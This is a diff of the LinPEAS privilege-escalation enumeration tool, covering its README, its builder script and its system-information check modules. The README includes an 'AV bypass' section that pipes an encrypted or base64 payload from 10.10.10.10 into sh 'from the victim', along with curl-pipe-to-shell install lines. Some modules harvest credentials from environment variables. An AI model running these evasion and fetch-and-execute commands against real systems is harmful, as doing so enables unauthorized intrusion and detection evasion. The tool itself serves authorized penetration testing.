-Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/peass-ng/PEASS-ng/releases/latest)**.
+Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/carlospolop/PEASS-ng/releases/latest)**.

 ```bash
-# From public github
-curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
+# From github
+curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
 ```

 ```bash
@ -58,24 +42,11 @@ less -r /dev/shm/linpeas.txt #Read with colors

 ```bash
 # Use a linpeas binary
-wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas_linux_amd64
+wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64
 chmod +x linpeas_linux_amd64
 ./linpeas_linux_amd64
 ```

-## AV bypass
-```bash
-#open-ssl encryption
-openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAES -in linpeas.sh -out lp.enc
-sudo python -m SimpleHTTPServer 80 #Start HTTP server
-curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAES | sh #Download from the victim
-
-#Base64 encoded
-base64 -w0 linpeas.sh > lp.enc
-sudo python -m SimpleHTTPServer 80 #Start HTTP server
-curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim
-```
-
 ## Firmware Analysis
 If you have a **firmware** and you want to **analyze it with linpeas** to **search for passwords or bad configured permissions** you have 2 main options.

@ -92,6 +63,19 @@ bash /linpeas.sh -o software_information,interesting_files,api_keys_regex
 bash /path/to/linpeas.sh -f /path/to/folder
 ```

+## AV bypass
+```bash
+#open-ssl encryption
+openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAES -in linpeas.sh -out lp.enc
+sudo python -m SimpleHTTPServer 80 #Start HTTP server
+curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAES | sh #Download from the victim
+
+#Base64 encoded
+base64 -w0 linpeas.sh > lp.enc
+sudo python -m SimpleHTTPServer 80 #Start HTTP server
+curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim
+```
+
 ## Basic Information

 The goal of this script is to search for possible **Privilege Escalation Paths** (tested in Debian, CentOS, FreeBSD, OpenBSD and MacOS).
@ -111,7 +95,7 @@ By default linpeas takes around **4 mins** to complete, but It could take from *
 **Interesting parameters:**
 - **-a** (all checks except regex) - This will **execute also the check of processes during 1 min, will search more possible hashes inside files, and brute-force each user using `su` with the top2000 passwords.**
 - **-e** (extra enumeration) - This will execute **enumeration checkes that are avoided by default**
- **-r** (regex checks) - This will search for **hundreds of API keys of different platforms in the Filesystem**
+- **-r** (regex checks) - This will search for **hundreds of API keys of different platforms in the silesystem**
 - **-s** (superfast & stealth) - This will bypass some time consuming checks - **Stealth mode** (Nothing will be written to disk)
 - **-P** (Password) - Pass a password that will be used with `sudo -l` and bruteforcing other users
 - **-D** (Debug) - Print information about the checks that haven't discovered anything and about the time each check took
@ -160,23 +144,56 @@ With LinPEAS you can also **discover hosts automatically** using `fping`, `ping`

 LinPEAS will **automatically search for this binaries** in `$PATH` and let you know if any of them is available. In that case you can use LinPEAS to hosts dicovery and/or port scanning.

-![](https://github.com/peass-ng/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/images/network.png)
+![](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/images/network.png)


 ## Colors
+
+<details>
+<summary>Details</summary>
+
 LinPEAS uses colors to indicate where does each section begin. But **it also uses them the identify potencial misconfigurations**.

- The ![](https://placehold.it/15/b32400/000000?text=+) **Red/Yellow** ![](https://placehold.it/15/fff500/000000?text=+) color is used for identifing configurations that lead to PE (99% sure).
+The ![](https://placehold.it/15/b32400/000000?text=+) **Red/Yellow** ![](https://placehold.it/15/fff500/000000?text=+) color is used for identifing configurations that lead to PE (99% sure).

- The ![](https://placehold.it/15/b32400/000000?text=+) **Red** color is used for identifing suspicious configurations that could lead to privilege escalation.
+The ![](https://placehold.it/15/b32400/000000?text=+) **Red** color is used for identifing suspicious configurations that could lead to PE:
+- Possible exploitable kernel versions
+- Vulnerable sudo versions
+- Identify processes running as root
+- Not mounted devices
+- Dangerous fstab permissions
+- Writable files in interesting directories
+- SUID/SGID binaries that have some vulnerable version (it also specifies the vulnerable version)
+- SUDO binaries that can be used to escalate privileges in sudo -l (without passwd) (https://gtfobins.github.io/)
+- Check /etc/doas.conf
+- 127.0.0.1 in netstat
+- Known files that could contain passwords
+- Capabilities in interesting binaries
+- Interesting capabilities of a binary
+- Writable folders and wilcards inside info about cron jobs
+- Writables folders in PATH
+- Groups that could lead to root
+- Files that could contains passwords
+- Suspicious cronjobs

- The ![](https://placehold.it/15/66ff33/000000?text=+) **Green** color is used for known good configurations (based on the name not on the conten!)
+The ![](https://placehold.it/15/66ff33/000000?text=+) **Green** color is used for:
+- Common processes run by root
+- Common not interesting devices to mount
+- Not dangerous fstab permissions
+- SUID/SGID common binaries (the bin was already found in other machines and searchsploit doesn't identify any vulnerable version)
+- Common .sh files in path
+- Common names of users executing processes
+- Common cronjobs

- The ![](https://placehold.it/15/0066ff/000000?text=+) **Blue** color is used for: Users without shell & Mounted devices
+The ![](https://placehold.it/15/0066ff/000000?text=+) **Blue** color is used for:
+- Users without shell
+- Mounted devices

- The ![](https://placehold.it/15/33ccff/000000?text=+) **Light Cyan** color is used for: Users with shell
+The ![](https://placehold.it/15/33ccff/000000?text=+) **Light Cyan** color is used for:
+- Users with shell

- The ![](https://placehold.it/15/bf80ff/000000?text=+) **Light Magenta** color is used for: Current username
+The ![](https://placehold.it/15/bf80ff/000000?text=+) **Light Magenta** color is used for:
+- Current username

 </details>

@ -201,12 +218,15 @@ Are you a PEASS fan? Get now our merch at **[PEASS Shop](https://teespring.com/s

 ## Collaborate

-If you want to help with the TODO tasks or with anything, you can do it using **[github issues](https://github.com/peass-ng/privilege-escalation-awesome-scripts-suite/issues) or you can submit a pull request**.
+If you want to help with the TODO tasks or with anything, you can do it using **[github issues](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues) or you can submit a pull request**.

-If you find any issue, please report it using **[github issues](https://github.com/peass-ng/privilege-escalation-awesome-scripts-suite/issues)**.
+If you find any issue, please report it using **[github issues](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues)**.

 **Linpeas** is being **updated** every time I find something that could be useful to escalate privileges.

 ## Advisory

 All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
+
+
+By Polop<sup>(TM)</sup>
--- a/linPEAS/builder/README.md
+++ b/linPEAS/builder/README.md
@ -1,78 +0,0 @@
-# Build you own linpeas!
-
-You can **build you own linpeas which will contain only the checks you want**. This is useful to reduce the time it takes to run linpeas and to make linpeas more stealth and modular.
-
-## Quick start building linpeas.sh
-
-It's possible to indicate the params `--all`, `--all-no-fat` and `--small` to build the classic `linpeas_fat.sh`, `linpeas.sh` and `linpeas_small.sh`:
-
- **linpeas_fat.sh**: Contains all checks, even third party applications in base64 embedded.
- **linpeas.sh**: Contains all checks, but only the third party application `linux exploit suggester` is embedded. This is the default `linpeas.sh`.
- **linpeas_small.sh**: Contains only the most *important* checks making its size smaller.
-
-However, in order to indicate only some specific checks, you can use the `--include` and `--exclude` params. These arguments supports a comma separated list of modules to add or remove from the final linpeas. Note that the matchs are done by checking **if the module path string contains any of the words** indicated in those params. Therefore, if you want to inde all the tests from the `linpeas_parts/3_cloud` it's enough to indicate `--include "cloud"`. Or if you want to include only the check `linpeas_parts/3_cloud/1_Check_if_in_Cloud` you can indicate `--include "Check_if_in_Cloud"`.
-
-```bash
-# Run this commands from 1 level above the builder folder. From here: cd ..
-# Build linpeas_fat (linpeas with all checks, even third party applications in base64 embedded)
-python3 -m builder.linpeas_builder --all --output /tmp/linpeas_fat.sh
-
-# Build regular linpeas
-python3 -m builder.linpeas_builder --all-no-fat --output /tmp/linpeas.sh
-
-# Build small linpeas
-python3 -m builder.linpeas_builder --small --output /tmp/linpeas_small.sh
-
-# Build linpeas only with container and cloud checks
-python3 -m builder.linpeas_builder --include "container,cloud" --output /tmp/linpeas_custom.sh
-
-# Build linpeas only with regexes
-python3 -m builder.linpeas_builder --include "api_keys_regex" --output /tmp/linpeas_custom.sh
-
-# Build linpeas only with some specific modules
-## You can customize it as much as you want
-python3 -m builder.linpeas_builder --include "CPU_info,Sudo_version,Clipboard_highlighted_text" --output /tmp/linpeas_custom.sh
-
-# Build linpeas excluding some specific modules
-python3 -m builder.linpeas_builder --exclude "CPU_info,Sudo_version,Clipboard_highlighted_text" --output /tmp/linpeas_custom.sh
-```
-
-## How to add new modules
-
-Adding new modules is very easy. You just need to create a new file in the `linpeas_parts/<corresponding section>` folder with the following structure with the bash code to run. Note that every new module should have some specific metadata at the beggining of the file. This metadata is used by the builder to generate the final linpeas.
-
-Metadata example:
-
-```bash
-# Title: Cloud - Check if in cloud
-# ID: CL_Check_if_in_cloud
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Check if the current system is inside a cloud environment
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: check_aws_codebuild, check_aws_ec2, check_aws_ecs, check_aws_lambda, check_az_app, check_az_vm, check_do, check_gcp, check_ibm_vm, check_tencent_cvm, print_list
-# Global Variables: $is_aws_codebuild, $is_aws_ecs, $is_aws_ec2, , $is_aws_lambda, $is_az_app, $is_az_vm, $is_do, $is_gcp_vm, $is_gcp_function, $is_ibm_vm, $is_aws_ec2_beanstalk, $is_aliyun_ecs, $is_tencent_cvm
-# Initial Functions: check_gcp, check_aws_ecs, check_aws_ec2, check_aws_lambda, check_aws_codebuild, check_do, check_ibm_vm, check_az_vm, check_az_app, check_aliyun_ecs, check_tencent_cvm
-# Generated Global Variables:
-# Fat linpeas: 0
-# Small linpeas: 1
-
-<code>
-```
-
-### Metadata parts explained
-
- **Title**: Title of the module
- **ID**: Unique identifier of the module. It has to be the same as the filename without the extension and with the section identifier as prefix (in this case `CL`)
- **Author**: Author of the module
- **Last Update**: Last update of the module
- **Description**: Description of the module
- **License**: License of the module
- **Version**: Version of the module
- **Functions Used**: Functions used by the module inside the bash code. If your module is using a function not defined here, linpeas won't be built.
- **Global Variables**: Global variables used by the module inside the bash code. If your module is using a global variable not defined here, linpeas won't be built.
- **Initial Functions**: Functions that are called at the beggining of the module. If your module is using a function not defined here, linpeas won't be built.
- **Generated Global Variables**: Global variables generated (given a relevant value) by the module. If your module is generating a global variable not defined here, linpeas won't be built.
- **Fat linpeas**: Set only as 1 if the module is loading a third party app, if not 0.
- **Small linpeas**: Set as 1 if it's a quick check, if not 0.
--- a/linPEAS/builder/linpeas_base.sh
+++ b/linPEAS/builder/linpeas_base.sh
--- a/linPEAS/builder/linpeas_builder.py
+++ b/linPEAS/builder/linpeas_builder.py
@ -5,51 +5,29 @@ from .src.yamlGlobals import FINAL_FAT_LINPEAS_PATH, FINAL_LINPEAS_PATH, TEMPORA

 import os
 import stat
-import argparse

-# python3 -m builder.linpeas_builder
-def main(all_modules, all_no_fat_modules, no_network_scanning, small, include_modules, exclude_modules, output):
+#python3 -m builder.linpeas_builder
+def main():
    # Load configuration
    ploaded = PEASLoaded()

-    # Build temporary linpeas_base.sh file
-    lbasebuilder = LinpeasBaseBuilder(all_modules, all_no_fat_modules, no_network_scanning, small, include_modules, exclude_modules)
+    # Build temporary  linpeas_base.sh file
+    lbasebuilder = LinpeasBaseBuilder()
    lbasebuilder.build()

    # Build final linpeas.sh
    lbuilder = LinpeasBuilder(ploaded)
    lbuilder.build()
-    lbuilder.write_linpeas(output)
-    os.remove(TEMPORARY_LINPEAS_BASE_PATH) # Remove the built linpeas_base_temp.sh file
+    lbuilder.write_linpeas(FINAL_FAT_LINPEAS_PATH)
+    lbuilder.write_linpeas(FINAL_LINPEAS_PATH, rm_startswith="FAT_LINPEAS")
+    os.remove(TEMPORARY_LINPEAS_BASE_PATH) #Remove the built linpeas_base.sh file
+    
+    st = os.stat(FINAL_FAT_LINPEAS_PATH)
+    os.chmod(FINAL_FAT_LINPEAS_PATH, st.st_mode | stat.S_IEXEC)
+    
+    st = os.stat(FINAL_LINPEAS_PATH)
+    os.chmod(FINAL_LINPEAS_PATH, st.st_mode | stat.S_IEXEC)

-    st = os.stat(output)
-    os.chmod(output, st.st_mode | stat.S_IEXEC)

 if __name__ == "__main__":
-    parser = argparse.ArgumentParser(description='Build you own linpeas.sh')
-    parser.add_argument('--all', action='store_true', help='Build linpeas with all modules (linpeas_fat).')
-    parser.add_argument('--all-no-fat', action='store_true', help='Build linpeas with all modules except fat ones.')
-    parser.add_argument('--no-network-scanning', action='store_true', help='Build linpeas without network scanning.')
-    parser.add_argument('--small', action='store_true', help='Build small version of linpeas.')
-    parser.add_argument('--include', type=str, help='Build linpeas only with the modules indicated you can indicate section names or module IDs).')
-    parser.add_argument('--exclude', type=str, help='Exclude the given modules (you can indicate section names or module IDs).')
-    parser.add_argument('--output', required=True, type=str, help='Path to write the final linpeas file to.')
-    args = parser.parse_args()
-
-    all_modules = args.all
-    all_no_fat_modules = args.all_no_fat
-    no_network_scanning = args.no_network_scanning
-    small = args.small
-    include_modules = args.include.split(",") if args.include else []
-    include_modules = [m.strip().lower() for m in include_modules]
-    exclude_modules = args.exclude.split(",") if args.exclude else []
-    exclude_modules = [m.strip().lower() for m in exclude_modules]
-    output = args.output
-
-    # If not all, all-no-fat, small or include, exit
-    if not args.all and not args.all_no_fat and not args.small and not args.include:
-        print("You must specify one of the following options: --all, --all-no-fat, --small or --include")
-        parser.print_help()
-        exit(1)
-    
-    main(all_modules, all_no_fat_modules, no_network_scanning, small, include_modules, exclude_modules, output)
+    main()
--- a/linPEAS/builder/linpeas_parts/functions/search_for_regex.sh
+++ b/linPEAS/builder/linpeas_parts/functions/search_for_regex.sh
@ -1,17 +1,3 @@
-# Title: API Keys Regex - search_for_regex
-# ID: search_for_regex
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Search for a given regex in the file system
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_3title_no_nl
-# Global Variables: $backup_folders_row, $HOMESEARCH, $ROOT_FOLDER, $SEARCH_IN_FOLDER
-# Initial Functions:
-# Generated Global Variables: $regex, $title, $caseSensitive
-# Fat linpeas: 0
-# Small linpeas: 1
-

 search_for_regex(){
    title=$1
@ -53,3 +39,11 @@ search_for_regex(){
    wait
    printf "\033[2K\r"
 }
+
+
+
+if [ "$REGEXES" ] && [ "$TIMEOUT" ]; then
+    peass{REGEXES}
+else
+    echo "Regexes to search for API keys aren't activated, use param '-r' "
+fi
--- a/linPEAS/builder/linpeas_parts/10_api_keys_regex/regexes.sh
+++ b/linPEAS/builder/linpeas_parts/10_api_keys_regex/regexes.sh
@ -1,20 +0,0 @@
-# Title: API Keys Regex - Regexes
-# ID: RX_regexes
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Regexes
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, search_for_regex
-# Global Variables: $REGEXES, $TIMEOUT
-# Initial Functions:
-# Generated Global Variables:
-# Fat linpeas: 0
-# Small linpeas: 0
-
-
-if [ "$REGEXES" ] && [ "$TIMEOUT" ]; then
-    peass{REGEXES}
-else
-    echo "Regexes to search for API keys aren't activated, use param '-r' "
-fi
--- a/linPEAS/builder/linpeas_parts/1_system_information.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information.sh
@ -0,0 +1,101 @@
+###########################################
+#-------------) System Info (-------------#
+###########################################
+
+#-- SY) OS
+print_2title "Operative system"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits"
+(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED},"
+warn_exec lsb_release -a 2>/dev/null
+if [ "$MACPEAS" ]; then
+    warn_exec system_profiler SPSoftwareDataType
+fi
+echo ""
+
+#-- SY) Sudo
+print_2title "Sudo version"
+if [ "$(command -v sudo 2>/dev/null)" ]; then
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version"
+sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED},"
+else echo_not_found "sudo"
+fi
+echo ""
+
+#--SY) USBCreator
+if (busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator) || [ "$DEBUG" ]; then
+    print_2title "USBCreator"
+    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation"
+
+    pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+")
+    if [ -z "$pc_version" ]; then
+        pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2)
+    fi
+    if [ -n "$pc_version" ]; then
+        pc_length=${#pc_version}
+        pc_major=$(echo "$pc_version" | cut -d. -f1)
+        pc_minor=$(echo "$pc_version" | cut -d. -f2)
+        if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor"  -lt 21 ]; then
+            echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED},"
+        fi
+    fi
+fi
+echo ""
+
+#-- SY) PATH
+
+print_2title "PATH"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses"
+if ! [ "$IAMROOT" ]; then
+    echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g"
+fi
+
+if [ "$DEBUG" ]; then
+     echo "New path exported: $PATH"
+fi
+echo ""
+
+#-- SY) Date
+print_2title "Date & uptime"
+warn_exec date 2>/dev/null
+warn_exec uptime 2>/dev/null
+echo ""
+
+#-- SY) System stats
+if [ "$EXTRA_CHECKS" ]; then
+    print_2title "System stats"
+    (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk"
+    warn_exec free 2>/dev/null
+    echo ""
+fi
+
+#-- SY) CPU info
+if [ "$EXTRA_CHECKS" ]; then
+    print_2title "CPU info"
+    warn_exec lscpu 2>/dev/null
+    echo ""
+fi
+
+if [ -d "/dev" ] || [ "$DEBUG" ] ; then
+    print_2title "Any sd*/disk* disk in /dev? (limit 20)"
+    ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20
+    echo ""
+fi
+
+if [ -f "/etc/fstab" ] || [ "$DEBUG" ]; then
+    print_2title "Unmounted file-system?"
+    print_info "Check if you can mount umounted devices"
+    grep -v "^#" /etc/fstab 2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED},g" | sed -${E} "s%$mounted%${SED_BLUE}%g" | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g"
+    echo ""
+fi
+
+if ([ "$(command -v diskutil)" ] || [ "$DEBUG" ]) && [ "$EXTRA_CHECKS" ]; then
+    print_2title "Mounted disks information"
+    warn_exec diskutil list
+    echo ""
+fi
+
+if [ "$(command -v smbutil)" ] || [ "$DEBUG" ]; then
+    print_2title "Mounted SMB Shares"
+    warn_exec smbutil statshares -a
+    echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/1_system_information/10_Environment.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/10_Environment.sh
@ -1,39 +0,0 @@
-# Title: System Information - Environment
-# ID: SY_Environment
-# Author: Carlos Polop
-# Last Update: 07-03-2024
-# Description: Check for sensitive information in environment variables that could lead to privilege escalation:
-#   - Credentials in environment variables
-#   - API keys and tokens
-#   - Sensitive configuration data
-#   - Common vulnerable scenarios:
-#     * Hardcoded credentials in environment
-#     * API keys exposed in environment
-#     * Database credentials in environment
-#     * Service account tokens
-#   - Exploitation methods:
-#     * Credential harvesting: Extract sensitive data from environment
-#     * Common attack vectors:
-#       - Password/credential extraction
-#       - API key abuse
-#       - Token theft
-#       - Configuration data leakage
-#     * Exploit techniques:
-#       - Environment variable dumping
-#       - Credential reuse
-#       - Token reuse
-#       - Configuration abuse
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: echo_not_found, print_2title, print_info
-# Global Variables: $NoEnvVars, $EnvVarsRed
-# Initial Functions:
-# Generated Global Variables:
-# Fat linpeas: 0
-# Small linpeas: 1
-
-
-print_2title "Environment"
-print_info "Any private information inside environment variables?"
-(env || printenv || set) 2>/dev/null | grep -Eiv "$NoEnvVars" | sed -${E} "s,$EnvVarsRed,${SED_RED},g" || echo_not_found "env || set"
-echo ""
--- a/linPEAS/builder/linpeas_parts/1_system_information/11_Dmesg.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/11_Dmesg.sh
@ -1,37 +0,0 @@
-# Title: System Information - Dmesg
-# ID: SY_Dmesg
-# Author: Carlos Polop
-# Last Update: 07-03-2024
-# Description: Check for kernel signature verification failures that could lead to privilege escalation:
-#   - Failed kernel module signature verifications
-#   - Common vulnerable scenarios:
-#     * Disabled kernel module signing
-#     * Failed signature verifications
-#     * Unsigned kernel modules
-#   - Exploitation methods:
-#     * Kernel module injection: Load malicious kernel modules
-#     * Common attack vectors:
-#       - Kernel module loading
-#       - Kernel module replacement
-#       - Kernel module modification
-#     * Exploit techniques:
-#       - Module signing bypass
-#       - Kernel module injection
-#       - Kernel module modification
-#       - Kernel module replacement
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: echo_not_found, print_2title, print_info
-# Global Variables: $DEBUG
-# Initial Functions:
-# Generated Global Variables:
-# Fat linpeas: 0
-# Small linpeas: 0
-
-
-if [ "$(command -v dmesg 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]; then
-    print_2title "Searching Signature verification failed in dmesg"
-    print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#dmesg-signature-verification-failed"
-    (dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg"
-    echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/1_system_information/12_Macos_os_checks.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/12_Macos_os_checks.sh
@ -1,52 +0,0 @@
-# Title: System Information - MacOS OS checks
-# ID: SY_Macos_os_checks
-# Author: Carlos Polop
-# Last Update: 07-03-2024
-# Description: Check for MacOS-specific vulnerabilities and misconfigurations that could lead to privilege escalation:
-#   - Unsigned kernel extensions
-#   - Non-Apple kernel extensions
-#   - System Integrity Protection (SIP) status
-#   - Gatekeeper status
-#   - Common vulnerable scenarios:
-#     * Disabled SIP
-#     * Unsigned kernel extensions
-#     * Third-party kernel extensions
-#     * Disabled Gatekeeper
-#   - Exploitation methods:
-#     * Kernel extension injection: Load malicious kernel extensions
-#     * Common attack vectors:
-#       - SIP bypass
-#       - Kernel extension loading
-#       - Gatekeeper bypass
-#       - System modification
-#     * Exploit techniques:
-#       - Kernel extension injection
-#       - SIP bypass
-#       - Gatekeeper bypass
-#       - System modification
-# License: GNU GPL
-# Version: 1.0
-# Functions Used:macosNotSigned, print_2title
-# Global Variables: $MACPEAS
-# Initial Functions:
-# Generated Global Variables:
-# Fat linpeas: 0
-# Small linpeas: 0
-
-
-if [ "$MACPEAS" ]; then
-    print_2title "Kernel Extensions not belonging to apple"
-    kextstat 2>/dev/null | grep -Ev " com.apple."
-    echo ""
-
-    print_2title "Unsigned Kernel Extensions"
-    macosNotSigned /Library/Extensions
-    macosNotSigned /System/Library/Extensions
-    echo ""
-fi
-
-if [ "$MACPEAS" ] && [ "$(command -v brew 2>/dev/null || echo -n '')" ]; then
-    print_2title "Brew Doctor Suggestions"
-    brew doctor
-    echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/1_system_information/13_Linux_exploit_suggester.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/13_Linux_exploit_suggester.sh
@ -1,39 +0,0 @@
-# Title: System Information - Linux Exploit Suggester
-# ID: SY_Linux_exploit_suggester
-# Author: Carlos Polop
-# Last Update: 07-03-2024
-# Description: Execute Linux Exploit Suggester to identify potential kernel exploits:
-#   - Automated kernel vulnerability detection
-#   - Common vulnerable scenarios:
-#     * Known kernel vulnerabilities
-#     * Unpatched kernel versions
-#     * Missing security patches
-#   - Exploitation methods:
-#     * Kernel exploit execution: Use suggested exploits
-#     * Common attack vectors:
-#       - Kernel memory corruption
-#       - Race conditions
-#       - Use-after-free
-#       - Integer overflow
-#     * Exploit techniques:
-#       - Kernel memory manipulation
-#       - Privilege escalation
-#       - Root access acquisition
-#       - System compromise
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, print_info
-# Global Variables: $MACPEAS
-# Initial Functions:
-# Generated Global Variables: $les_b64
-# Fat linpeas: 0
-# Small linpeas: 1
-
-
-if [ "$(command -v bash 2>/dev/null || echo -n '')" ] && ! [ "$MACPEAS" ]; then
-    print_2title "Executing Linux Exploit Suggester"
-    print_info "https://github.com/mzet-/linux-exploit-suggester"
-    les_b64="peass{https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh}"
-    echo $les_b64 | base64 -d | bash | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "\[CVE" -A 10 | grep -Ev "^\-\-$" | sed -${E} "s/\[(CVE-[0-9]+-[0-9]+,?)+\].*/${SED_RED}/g"
-    echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/1_system_information/14_Linux_exploit_suggester_2.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/14_Linux_exploit_suggester_2.sh
@ -1,41 +0,0 @@
-# Title: System Information - Linux Exploit Suggester 2
-# ID: SY_Linux_exploit_suggester_2
-# Author: Carlos Polop
-# Last Update: 07-03-2024
-# Description: Execute Linux Exploit Suggester 2 (Perl version) to identify potential kernel exploits:
-#   - Alternative kernel vulnerability detection
-#   - Perl-based exploit suggestions
-#   - Common vulnerable scenarios:
-#     * Known kernel vulnerabilities
-#     * Unpatched kernel versions
-#     * Missing security patches
-#     * Alternative exploit paths
-#   - Exploitation methods:
-#     * Kernel exploit execution: Use suggested exploits
-#     * Common attack vectors:
-#       - Kernel memory corruption
-#       - Race conditions
-#       - Use-after-free
-#       - Integer overflow
-#     * Exploit techniques:
-#       - Kernel memory manipulation
-#       - Privilege escalation
-#       - Root access acquisition
-#       - System compromise
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, print_info
-# Global Variables:
-# Initial Functions:
-# Generated Global Variables: $les2_b64
-# Fat linpeas: 1
-# Small linpeas: 0
-
-
-if [ "$(command -v perl 2>/dev/null || echo -n '')" ] && ! [ "$MACPEAS" ]; then
-    print_2title "Executing Linux Exploit Suggester 2"
-    print_info "https://github.com/jondonas/linux-exploit-suggester-2"
-    les2_b64="peass{https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl}"
-    echo $les2_b64 | base64 -d | perl 2>/dev/null | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -iE "CVE" -B 1 -A 10 | grep -Ev "^\-\-$" | sed -${E} "s,CVE-[0-9]+-[0-9]+,${SED_RED},g"
-    echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/1_system_information/15_CVE_2021_3560.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/15_CVE_2021_3560.sh
@ -1,39 +0,0 @@
-# Title: System Information - CVE_2021_3560
-# ID: SY_CVE_2021_3560
-# Author: Carlos Polop
-# Last Update: 07-03-2024
-# Description: Check for Polkit vulnerability (CVE-2021-3560) that could lead to privilege escalation:
-#   - Vulnerable Polkit versions:
-#     * polkit 0.105-26 (Ubuntu)
-#     * polkit 0.117-2 (RHEL)
-#     * polkit 0.115-6 (RHEL)
-#   - Common vulnerable scenarios:
-#     * Unpatched Polkit versions
-#     * Default Polkit configurations
-#   - Exploitation methods:
-#     * Race condition in Polkit authentication
-#     * Common attack vectors:
